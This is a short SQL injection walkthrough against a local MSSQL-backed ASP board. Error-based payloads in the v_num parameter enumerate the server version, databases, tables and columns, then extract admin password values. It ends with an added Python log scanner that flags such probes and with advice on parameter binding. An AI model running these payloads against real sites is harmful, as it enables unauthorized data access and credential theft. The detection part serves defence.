[SQL Injection] mssql

Check the version
hxxp://localhost/shop_board/shop_board_list.asp?page=1&v_num=
26 and @@version=1--


Check the current DB
26 and (select db_name())=1--


Check the DB name for a given database ID
26 and (select name from master..sysdatabases where dbid=2)=1--
1 -> master
2 -> tempdb
3 -> model
12 -> oyesmall


Check table names (add the table names to exclude from that DB as conditions)
26 and (select top 1 name from oyesmall.dbo.sysobjects where xtype='U' and name <> 'poll_tail')=1--
     admin_tb
     banner


Check column names (first field name)
26 and (select top 1 syscolumns.name from sysobjects INNER JOIN syscolumns ON sysobjects.id = syscolumns.id where sysobjects.name='admin_tb')=1--
     adminid
     adminpwd
     email
     gubun

and syscolumns.name <> 'field name to exclude')--
26 and (select top 1 syscolumns.name from sysobjects INNER JOIN syscolumns ON sysobjects.id = syscolumns.id where sysobjects.name='admin_tb' and syscolumns.name <> 'adminid' and syscolumns.name <> 'adminpwd' and syscolumns.name <> 'email')=1--


Check the column values of the table
26 and (select adminpwd from admin_tb)=1--
admin
lab
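
Every probe above puts MSSQL metadata names (@@version, db_name(), sysdatabases, sysobjects, syscolumns) or a subquery compared with an integer into the numeric v_num parameter. As an added example (not part of the original post), the following Python flags such requests in web-server access logs; the four-field log format, the sample lines with their status codes, and the function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Parameters this page's URL passes as plain integers (assumed from the URL shown).
NUMERIC_PARAMS = {"page", "v_num"}
# MSSQL metadata names that appear in the probes on this page.
MSSQL_MARKERS = re.compile(
    r"@@version|db_name\s*\(|sysdatabases|sysobjects|syscolumns", re.IGNORECASE)
# A subquery compared with an integer, the shape that forces a conversion error.
SUBQUERY_CMP = re.compile(r"\(\s*select\b.+\)\s*=\s*\d+", re.IGNORECASE | re.DOTALL)

# Constructed sample log lines: "<method> <uri-stem> <uri-query> <status>".
SAMPLE_LOG = """\
GET /shop_board/shop_board_list.asp page=1&v_num=26 200
GET /shop_board/shop_board_list.asp page=1&v_num=26+and+@@version=1-- 500
GET /shop_board/shop_board_list.asp page=1&v_num=26%20and%20(select%20db_name())=1-- 500
GET /shop_board/shop_board_list.asp page=2&v_num=31 200
"""

def classify_query(query):
    """Return the sorted findings for one raw (still URL-encoded) query string."""
    findings = set()
    # parse_qsl decodes %XX and '+' and splits each pair at the first '=' only,
    # so an '=' inside an injected value stays part of that value.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not (value.isascii() and value.isdigit()):
            findings.add("non_numeric:" + name.lower())
        if MSSQL_MARKERS.search(value):
            findings.add("mssql_metadata")
        if SUBQUERY_CMP.search(value):
            findings.add("subquery_compare")
    return sorted(findings)

def scan(log_text):
    """Return (line_number, status, findings) for every flagged log line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split()
        if len(fields) != 4:
            continue  # not in the assumed four-field format
        findings = classify_query(fields[2])
        if findings:
            hits.append((number, int(fields[3]), findings))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Log matching like this only reveals probing after the fact; the underlying fix is to bind v_num as an integer parameter instead of concatenating it into the SQL string, and to stop returning database error text to the client.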

